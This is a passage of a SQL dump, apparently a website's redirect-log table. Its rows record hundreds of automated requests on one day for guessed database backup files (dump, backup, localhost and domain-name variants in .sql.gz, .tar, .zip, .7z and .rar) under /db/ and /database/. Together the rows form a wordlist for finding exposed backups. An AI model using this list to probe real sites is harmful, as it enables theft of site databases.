17:20:37','0000-00-00 00:00:00',301),(11090,'http://ekvatorprint.com.ua/db/localhost_dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:37','0000-00-00 00:00:00',301),(11091,'http://ekvatorprint.com.ua/db/localhost-dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:39','0000-00-00 00:00:00',301),(11092,'http://ekvatorprint.com.ua/db/localhostbackup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:39','0000-00-00 00:00:00',301),(11093,'http://ekvatorprint.com.ua/db/localhost_backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:42','0000-00-00 00:00:00',301),(11094,'http://ekvatorprint.com.ua/db/localhost-backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:42','0000-00-00 00:00:00',301),(11095,'http://ekvatorprint.com.ua/db/backuplocalhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:42','0000-00-00 00:00:00',301),(11096,'http://ekvatorprint.com.ua/db/backup-localhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:43','0000-00-00 00:00:00',301),(11097,'http://ekvatorprint.com.ua/db/backup_localhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:44','0000-00-00 00:00:00',301),(11098,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uadb.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:44','0000-00-00 00:00:00',301),(11099,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_db.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:45','0000-00-00 00:00:00',301),(11100,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-db.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:45','0000-00-00 00:00:00',301),(11101,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_database.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:45','0000-00-00 00:00:00',301),(11102,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-database.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:45','0000-00-00 00:00:00',301),(11103,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:45','0000-00-00 00:00:00',301),(11104,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:46','0000-00-00 00:00:00',301),(11105,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uabackup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:46','0000-00-00 00:00:00',301),(11106,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:46','0000-00-00 00:00:00',301),(11107,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:46','0000-00-00 00:00:00',301),(11108,'http://ekvatorprint.com.ua/db/backupekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:47','0000-00-00 00:00:00',301),(11109,'http://ekvatorprint.com.ua/db/backup-ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:47','0000-00-00 00:00:00',301),(11110,'http://ekvatorprint.com.ua/db/backup_ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:47','0000-00-00 00:00:00',301),(11111,'http://ekvatorprint.com.ua/db/ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:48','0000-00-00 00:00:00',301),(11112,'http://ekvatorprint.com.ua/db/ekvatorprintdb.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:48','0000-00-00 00:00:00',301),(11113,'http://ekvatorprint.com.ua/db/ekvatorprint_db.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:48','0000-00-00 00:00:00',301),(11114,'http://ekvatorprint.com.ua/db/ekvatorprint-db.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:48','0000-00-00 00:00:00',301),(11115,'http://ekvatorprint.com.ua/db/ekvatorprint_database.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:48','0000-00-00 00:00:00',301),(11116,'http://ekvatorprint.com.ua/db/ekvatorprint-database.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:48','0000-00-00 00:00:00',301),(11117,'http://ekvatorprint.com.ua/db/ekvatorprint_dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:49','0000-00-00 00:00:00',301),(11118,'http://ekvatorprint.com.ua/db/ekvatorprint-dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:49','0000-00-00 00:00:00',301),(11119,'http://ekvatorprint.com.ua/db/ekvatorprintbackup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:49','0000-00-00 00:00:00',301),(11120,'http://ekvatorprint.com.ua/db/ekvatorprint-backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:49','0000-00-00 00:00:00',301),(11121,'http://ekvatorprint.com.ua/db/backupekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:49','0000-00-00 00:00:00',301),(11122,'http://ekvatorprint.com.ua/db/backup-ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:50','0000-00-00 00:00:00',301),(11123,'http://ekvatorprint.com.ua/db/backup_ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:20:50','0000-00-00 00:00:00',301),(11124,'http://ekvatorprint.com.ua/db/db.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:50','0000-00-00 00:00:00',301),(11125,'http://ekvatorprint.com.ua/db/dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:50','0000-00-00 00:00:00',301),(11126,'http://ekvatorprint.com.ua/db/dbdump.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:50','0000-00-00 00:00:00',301),(11127,'http://ekvatorprint.com.ua/db/database.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:51','0000-00-00 00:00:00',301),(11128,'http://ekvatorprint.com.ua/db/backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:52','0000-00-00 00:00:00',301),(11129,'http://ekvatorprint.com.ua/db/localhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:52','0000-00-00 00:00:00',301),(11130,'http://ekvatorprint.com.ua/db/localhostdb.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:52','0000-00-00 00:00:00',301),(11131,'http://ekvatorprint.com.ua/db/localhost_db.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:53','0000-00-00 00:00:00',301),(11132,'http://ekvatorprint.com.ua/db/localhost-db.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:53','0000-00-00 00:00:00',301),(11133,'http://ekvatorprint.com.ua/db/localhost_database.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:54','0000-00-00 00:00:00',301),(11134,'http://ekvatorprint.com.ua/db/localhost-database.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:54','0000-00-00 00:00:00',301),(11135,'http://ekvatorprint.com.ua/db/localhost_dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:54','0000-00-00 00:00:00',301),(11136,'http://ekvatorprint.com.ua/db/localhost-dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:55','0000-00-00 00:00:00',301),(11137,'http://ekvatorprint.com.ua/db/localhostbackup.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:55','0000-00-00 00:00:00',301),(11138,'http://ekvatorprint.com.ua/db/localhost_backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:56','0000-00-00 00:00:00',301),(11139,'http://ekvatorprint.com.ua/db/localhost-backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:56','0000-00-00 00:00:00',301),(11140,'http://ekvatorprint.com.ua/db/backuplocalhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:56','0000-00-00 00:00:00',301),(11141,'http://ekvatorprint.com.ua/db/backup-localhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:56','0000-00-00 00:00:00',301),(11142,'http://ekvatorprint.com.ua/db/backup_localhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:57','0000-00-00 00:00:00',301),(11143,'http://ekvatorprint.com.ua/db/ekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:57','0000-00-00 00:00:00',301),(11144,'http://ekvatorprint.com.ua/db/ekvatorprintdb.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:57','0000-00-00 00:00:00',301),(11145,'http://ekvatorprint.com.ua/db/ekvatorprint_db.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:57','0000-00-00 00:00:00',301),(11146,'http://ekvatorprint.com.ua/db/ekvatorprint-db.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:57','0000-00-00 00:00:00',301),(11147,'http://ekvatorprint.com.ua/db/ekvatorprint_database.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:57','0000-00-00 00:00:00',301),(11148,'http://ekvatorprint.com.ua/db/ekvatorprint-database.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:58','0000-00-00 00:00:00',301),(11149,'http://ekvatorprint.com.ua/db/ekvatorprint_dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:58','0000-00-00 00:00:00',301),(11150,'http://ekvatorprint.com.ua/db/ekvatorprint-dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:58','0000-00-00 00:00:00',301),(11151,'http://ekvatorprint.com.ua/db/ekvatorprintbackup.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:58','0000-00-00 00:00:00',301),(11152,'http://ekvatorprint.com.ua/db/ekvatorprint_backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:58','0000-00-00 00:00:00',301),(11153,'http://ekvatorprint.com.ua/db/ekvatorprint-backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:58','0000-00-00 00:00:00',301),(11154,'http://ekvatorprint.com.ua/db/backupekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:58','0000-00-00 00:00:00',301),(11155,'http://ekvatorprint.com.ua/db/backup-ekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:59','0000-00-00 00:00:00',301),(11156,'http://ekvatorprint.com.ua/db/backup_ekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:59','0000-00-00 00:00:00',301),(11157,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:59','0000-00-00 00:00:00',301),(11158,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uadb.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:59','0000-00-00 00:00:00',301),(11159,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_db.sql.tar',NULL,'','',1,0,'2017-08-16 17:20:59','0000-00-00 00:00:00',301),(11160,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-db.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:00','0000-00-00 00:00:00',301),(11161,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_database.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:00','0000-00-00 00:00:00',301),(11162,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-database.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:00','0000-00-00 00:00:00',301),(11163,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:01','0000-00-00 00:00:00',301),(11164,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:02','0000-00-00 00:00:00',301),(11165,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uabackup.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:02','0000-00-00 00:00:00',301),(11166,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:02','0000-00-00 00:00:00',301),(11167,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:03','0000-00-00 00:00:00',301),(11168,'http://ekvatorprint.com.ua/db/backupekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:03','0000-00-00 00:00:00',301),(11169,'http://ekvatorprint.com.ua/db/backup-ekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:04','0000-00-00 00:00:00',301),(11170,'http://ekvatorprint.com.ua/db/backup_ekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:21:05','0000-00-00 00:00:00',301),(11171,'http://ekvatorprint.com.ua/db/dbdump.zip',NULL,'','',1,0,'2017-08-16 17:21:05','0000-00-00 00:00:00',301),(11172,'http://ekvatorprint.com.ua/db/database.zip',NULL,'','',1,0,'2017-08-16 17:21:05','0000-00-00 00:00:00',301),(11173,'http://ekvatorprint.com.ua/db/localhostdb.zip',NULL,'','',1,0,'2017-08-16 17:21:06','0000-00-00 00:00:00',301),(11174,'http://ekvatorprint.com.ua/db/localhost_db.zip',NULL,'','',1,0,'2017-08-16 17:21:06','0000-00-00 00:00:00',301),(11175,'http://ekvatorprint.com.ua/db/localhost-db.zip',NULL,'','',1,0,'2017-08-16 17:21:07','0000-00-00 00:00:00',301),(11176,'http://ekvatorprint.com.ua/db/localhost_database.zip',NULL,'','',1,0,'2017-08-16 17:21:07','0000-00-00 00:00:00',301),(11177,'http://ekvatorprint.com.ua/db/localhost-database.zip',NULL,'','',1,0,'2017-08-16 17:21:08','0000-00-00 00:00:00',301),(11178,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uadb.zip',NULL,'','',1,0,'2017-08-16 17:21:08','0000-00-00 00:00:00',301),(11179,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_db.zip',NULL,'','',1,0,'2017-08-16 17:21:08','0000-00-00 00:00:00',301),(11180,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-db.zip',NULL,'','',1,0,'2017-08-16 17:21:09','0000-00-00 00:00:00',301),(11181,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_database.zip',NULL,'','',1,0,'2017-08-16 17:21:09','0000-00-00 00:00:00',301),(11182,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-database.zip',NULL,'','',1,0,'2017-08-16 17:21:09','0000-00-00 00:00:00',301),(11183,'http://ekvatorprint.com.ua/db/ekvatorprintdb.zip',NULL,'','',1,0,'2017-08-16 17:21:09','0000-00-00 00:00:00',301),(11184,'http://ekvatorprint.com.ua/db/ekvatorprint_db.zip',NULL,'','',1,0,'2017-08-16 17:21:09','0000-00-00 00:00:00',301),(11185,'http://ekvatorprint.com.ua/db/ekvatorprint-db.zip',NULL,'','',1,0,'2017-08-16 17:21:09','0000-00-00 00:00:00',301),(11186,'http://ekvatorprint.com.ua/db/ekvatorprint_database.zip',NULL,'','',1,0,'2017-08-16 17:21:10','0000-00-00 00:00:00',301),(11187,'http://ekvatorprint.com.ua/db/ekvatorprint-database.zip',NULL,'','',1,0,'2017-08-16 17:21:11','0000-00-00 00:00:00',301),(11188,'http://ekvatorprint.com.ua/db/db.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:11','0000-00-00 00:00:00',301),(11189,'http://ekvatorprint.com.ua/db/dbdump.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:11','0000-00-00 00:00:00',301),(11190,'http://ekvatorprint.com.ua/db/database.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:11','0000-00-00 00:00:00',301),(11191,'http://ekvatorprint.com.ua/db/localhostdb.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:11','0000-00-00 00:00:00',301),(11192,'http://ekvatorprint.com.ua/db/localhost_db.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:12','0000-00-00 00:00:00',301),(11193,'http://ekvatorprint.com.ua/db/localhost-db.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:13','0000-00-00 00:00:00',301),(11194,'http://ekvatorprint.com.ua/db/localhost_database.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:13','0000-00-00 00:00:00',301),(11195,'http://ekvatorprint.com.ua/db/localhost-database.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:13','0000-00-00 00:00:00',301),(11196,'http://ekvatorprint.com.ua/db/ekvatorprintdb.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:13','0000-00-00 00:00:00',301),(11197,'http://ekvatorprint.com.ua/db/ekvatorprint_db.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:14','0000-00-00 00:00:00',301),(11198,'http://ekvatorprint.com.ua/db/ekvatorprint-db.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:14','0000-00-00 00:00:00',301),(11199,'http://ekvatorprint.com.ua/db/ekvatorprint_database.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:15','0000-00-00 00:00:00',301),(11200,'http://ekvatorprint.com.ua/db/ekvatorprint-database.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:15','0000-00-00 00:00:00',301),(11201,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uadb.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:15','0000-00-00 00:00:00',301),(11202,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_db.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:16','0000-00-00 00:00:00',301),(11203,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-db.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:16','0000-00-00 00:00:00',301),(11204,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_database.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:16','0000-00-00 00:00:00',301),(11205,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-database.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:16','0000-00-00 00:00:00',301),(11206,'http://ekvatorprint.com.ua/db/db.tar',NULL,'','',1,0,'2017-08-16 17:21:17','0000-00-00 00:00:00',301),(11207,'http://ekvatorprint.com.ua/db/dbdump.tar',NULL,'','',1,0,'2017-08-16 17:21:17','0000-00-00 00:00:00',301),(11208,'http://ekvatorprint.com.ua/db/database.tar',NULL,'','',1,0,'2017-08-16 17:21:17','0000-00-00 00:00:00',301),(11209,'http://ekvatorprint.com.ua/db/localhostdb.tar',NULL,'','',1,0,'2017-08-16 17:21:18','0000-00-00 00:00:00',301),(11210,'http://ekvatorprint.com.ua/db/localhost_db.tar',NULL,'','',1,0,'2017-08-16 17:21:19','0000-00-00 00:00:00',301),(11211,'http://ekvatorprint.com.ua/db/localhost-db.tar',NULL,'','',1,0,'2017-08-16 17:21:19','0000-00-00 00:00:00',301),(11212,'http://ekvatorprint.com.ua/db/localhost_database.tar',NULL,'','',1,0,'2017-08-16 17:21:20','0000-00-00 00:00:00',301),(11213,'http://ekvatorprint.com.ua/db/localhost-database.tar',NULL,'','',1,0,'2017-08-16 17:21:20','0000-00-00 00:00:00',301),(11214,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uadb.tar',NULL,'','',1,0,'2017-08-16 17:21:20','0000-00-00 00:00:00',301),(11215,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_db.tar',NULL,'','',1,0,'2017-08-16 17:21:20','0000-00-00 00:00:00',301),(11216,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-db.tar',NULL,'','',1,0,'2017-08-16 17:21:21','0000-00-00 00:00:00',301),(11217,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_database.tar',NULL,'','',1,0,'2017-08-16 17:21:21','0000-00-00 00:00:00',301),(11218,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-database.tar',NULL,'','',1,0,'2017-08-16 17:21:21','0000-00-00 00:00:00',301),(11219,'http://ekvatorprint.com.ua/db/ekvatorprintdb.tar',NULL,'','',1,0,'2017-08-16 17:21:21','0000-00-00 00:00:00',301),(11220,'http://ekvatorprint.com.ua/db/ekvatorprint_db.tar',NULL,'','',1,0,'2017-08-16 17:21:21','0000-00-00 00:00:00',301),(11221,'http://ekvatorprint.com.ua/db/ekvatorprint-db.tar',NULL,'','',1,0,'2017-08-16 17:21:21','0000-00-00 00:00:00',301),(11222,'http://ekvatorprint.com.ua/db/ekvatorprint_database.tar',NULL,'','',1,0,'2017-08-16 17:21:22','0000-00-00 00:00:00',301),(11223,'http://ekvatorprint.com.ua/db/ekvatorprint-database.tar',NULL,'','',1,0,'2017-08-16 17:21:22','0000-00-00 00:00:00',301),(11224,'http://ekvatorprint.com.ua/db/db.7z',NULL,'','',1,0,'2017-08-16 17:21:22','0000-00-00 00:00:00',301),(11225,'http://ekvatorprint.com.ua/db/dbdump.7z',NULL,'','',1,0,'2017-08-16 17:21:22','0000-00-00 00:00:00',301),(11226,'http://ekvatorprint.com.ua/db/database.7z',NULL,'','',1,0,'2017-08-16 17:21:23','0000-00-00 00:00:00',301),(11227,'http://ekvatorprint.com.ua/db/localhostdb.7z',NULL,'','',1,0,'2017-08-16 17:21:23','0000-00-00 00:00:00',301),(11228,'http://ekvatorprint.com.ua/db/localhost_db.7z',NULL,'','',1,0,'2017-08-16 17:21:23','0000-00-00 00:00:00',301),(11229,'http://ekvatorprint.com.ua/db/localhost-db.7z',NULL,'','',1,0,'2017-08-16 17:21:24','0000-00-00 00:00:00',301),(11230,'http://ekvatorprint.com.ua/db/localhost_database.7z',NULL,'','',1,0,'2017-08-16 17:21:24','0000-00-00 00:00:00',301),(11231,'http://ekvatorprint.com.ua/db/localhost-database.7z',NULL,'','',1,0,'2017-08-16 17:21:24','0000-00-00 00:00:00',301),(11232,'http://ekvatorprint.com.ua/db/ekvatorprintdb.7z',NULL,'','',1,0,'2017-08-16 17:21:24','0000-00-00 00:00:00',301),(11233,'http://ekvatorprint.com.ua/db/ekvatorprint_db.7z',NULL,'','',1,0,'2017-08-16 17:21:24','0000-00-00 00:00:00',301),(11234,'http://ekvatorprint.com.ua/db/ekvatorprint-db.7z',NULL,'','',1,0,'2017-08-16 17:21:25','0000-00-00 00:00:00',301),(11235,'http://ekvatorprint.com.ua/db/ekvatorprint_database.7z',NULL,'','',1,0,'2017-08-16 17:21:25','0000-00-00 00:00:00',301),(11236,'http://ekvatorprint.com.ua/db/ekvatorprint-database.7z',NULL,'','',1,0,'2017-08-16 17:21:25','0000-00-00 00:00:00',301),(11237,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uadb.7z',NULL,'','',1,0,'2017-08-16 17:21:29','0000-00-00 00:00:00',301),(11238,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_db.7z',NULL,'','',1,0,'2017-08-16 17:21:29','0000-00-00 00:00:00',301),(11239,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-db.7z',NULL,'','',1,0,'2017-08-16 17:21:29','0000-00-00 00:00:00',301),(11240,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_database.7z',NULL,'','',1,0,'2017-08-16 17:21:29','0000-00-00 00:00:00',301),(11241,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-database.7z',NULL,'','',1,0,'2017-08-16 17:21:29','0000-00-00 00:00:00',301),(11242,'http://ekvatorprint.com.ua/db/dbdump.rar',NULL,'','',1,0,'2017-08-16 17:21:29','0000-00-00 00:00:00',301),(11243,'http://ekvatorprint.com.ua/db/database.rar',NULL,'','',1,0,'2017-08-16 17:21:30','0000-00-00 00:00:00',301),(11244,'http://ekvatorprint.com.ua/db/localhostdb.rar',NULL,'','',1,0,'2017-08-16 17:21:30','0000-00-00 00:00:00',301),(11245,'http://ekvatorprint.com.ua/db/localhost_db.rar',NULL,'','',1,0,'2017-08-16 17:21:30','0000-00-00 00:00:00',301),(11246,'http://ekvatorprint.com.ua/db/localhost-db.rar',NULL,'','',1,0,'2017-08-16 17:21:30','0000-00-00 00:00:00',301),(11247,'http://ekvatorprint.com.ua/db/localhost_database.rar',NULL,'','',1,0,'2017-08-16 17:21:30','0000-00-00 00:00:00',301),(11248,'http://ekvatorprint.com.ua/db/localhost-database.rar',NULL,'','',1,0,'2017-08-16 17:21:30','0000-00-00 00:00:00',301),(11249,'http://ekvatorprint.com.ua/db/ekvatorprint.com.uadb.rar',NULL,'','',1,0,'2017-08-16 17:21:31','0000-00-00 00:00:00',301),(11250,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_db.rar',NULL,'','',1,0,'2017-08-16 17:21:31','0000-00-00 00:00:00',301),(11251,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-db.rar',NULL,'','',1,0,'2017-08-16 17:21:31','0000-00-00 00:00:00',301),(11252,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua_database.rar',NULL,'','',1,0,'2017-08-16 17:21:32','0000-00-00 00:00:00',301),(11253,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua-database.rar',NULL,'','',1,0,'2017-08-16 17:21:33','0000-00-00 00:00:00',301),(11254,'http://ekvatorprint.com.ua/db/ekvatorprintdb.rar',NULL,'','',1,0,'2017-08-16 17:21:33','0000-00-00 00:00:00',301),(11255,'http://ekvatorprint.com.ua/db/ekvatorprint_db.rar',NULL,'','',1,0,'2017-08-16 17:21:33','0000-00-00 00:00:00',301),(11256,'http://ekvatorprint.com.ua/db/ekvatorprint-db.rar',NULL,'','',1,0,'2017-08-16 17:21:33','0000-00-00 00:00:00',301),(11257,'http://ekvatorprint.com.ua/db/ekvatorprint_database.rar',NULL,'','',1,0,'2017-08-16 17:21:33','0000-00-00 00:00:00',301),(11258,'http://ekvatorprint.com.ua/db/ekvatorprint-database.rar',NULL,'','',1,0,'2017-08-16 17:21:33','0000-00-00 00:00:00',301),(11259,'http://ekvatorprint.com.ua/database/db_backup.ekvatorprint.com.ua.sql.gz',NULL,'','',3,0,'2017-08-16 17:21:34','0000-00-00 00:00:00',301),(11260,'http://ekvatorprint.com.ua/database/db_backup.ekvatorprint.sql.gz',NULL,'','',3,0,'2017-08-16 17:21:35','0000-00-00 00:00:00',301),(11261,'http://ekvatorprint.com.ua/database/db_backup.sql.gz',NULL,'','',3,0,'2017-08-16 17:21:36','0000-00-00 00:00:00',301),(11262,'http://ekvatorprint.com.ua/database/db_backup.ekvatorprint.com.ua.sql',NULL,'','',3,0,'2017-08-16 17:21:38','0000-00-00 00:00:00',301),(11263,'http://ekvatorprint.com.ua/database/db_backup.ekvatorprint.sql',NULL,'','',3,0,'2017-08-16 17:21:38','0000-00-00 00:00:00',301),(11264,'http://ekvatorprint.com.ua/database/Dump.sql',NULL,'','',3,0,'2017-08-16 17:21:40','0000-00-00 00:00:00',301),(11265,'http://ekvatorprint.com.ua/database/backup.sql',NULL,'','',3,0,'2017-08-16 17:21:40','0000-00-00 00:00:00',301),(11266,'http://ekvatorprint.com.ua/database/backup.sql.zip',NULL,'','',3,0,'2017-08-16 17:21:40','0000-00-00 00:00:00',301),(11267,'http://ekvatorprint.com.ua/database/_db_.sql',NULL,'','',1,0,'2017-08-16 17:21:40','0000-00-00 00:00:00',301),(11268,'http://ekvatorprint.com.ua/database/_DB_.sql',NULL,'','',1,0,'2017-08-16 17:21:40','0000-00-00 00:00:00',301),(11269,'http://ekvatorprint.com.ua/database/_DB_.sql.zip',NULL,'','',1,0,'2017-08-16 17:21:41','0000-00-00 00:00:00',301),(11270,'http://ekvatorprint.com.ua/database/_DB_.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:41','0000-00-00 00:00:00',301),(11271,'http://ekvatorprint.com.ua/database/sql.txt',NULL,'','',1,0,'2017-08-16 17:21:41','0000-00-00 00:00:00',301),(11272,'http://ekvatorprint.com.ua/database/database.sql',NULL,'','',3,0,'2017-08-16 17:21:42','0000-00-00 00:00:00',301),(11273,'http://ekvatorprint.com.ua/database/sql.sql',NULL,'','',3,0,'2017-08-16 17:21:42','0000-00-00 00:00:00',301),(11274,'http://ekvatorprint.com.ua/database/bak.sql',NULL,'','',3,0,'2017-08-16 17:21:42','0000-00-00 00:00:00',301),(11275,'http://ekvatorprint.com.ua/database/bck.sql',NULL,'','',1,0,'2017-08-16 17:21:42','0000-00-00 00:00:00',301),(11276,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua.bak.sql',NULL,'','',1,0,'2017-08-16 17:21:42','0000-00-00 00:00:00',301),(11277,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua.bck.sql',NULL,'','',1,0,'2017-08-16 17:21:43','0000-00-00 00:00:00',301),(11278,'http://ekvatorprint.com.ua/database/ekvatorprint.bak.sql',NULL,'','',1,0,'2017-08-16 17:21:43','0000-00-00 00:00:00',301),(11279,'http://ekvatorprint.com.ua/database/ekvatorprint.bck.sql',NULL,'','',1,0,'2017-08-16 17:21:43','0000-00-00 00:00:00',301),(11280,'http://ekvatorprint.com.ua/database/data.sql',NULL,'','',1,0,'2017-08-16 17:21:44','0000-00-00 00:00:00',301),(11281,'http://ekvatorprint.com.ua/database/dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:21:46','0000-00-00 00:00:00',301),(11282,'http://ekvatorprint.com.ua/database/dump.sql.tgz',NULL,'','',1,0,'2017-08-16 17:21:46','0000-00-00 00:00:00',301),(11283,'http://ekvatorprint.com.ua/database/dump.sql.bck',NULL,'','',1,0,'2017-08-16 17:21:46','0000-00-00 00:00:00',301),(11284,'http://ekvatorprint.com.ua/database/www.ekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:21:46','0000-00-00 00:00:00',301),(11285,'http://ekvatorprint.com.ua/database/www.ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:21:47','0000-00-00 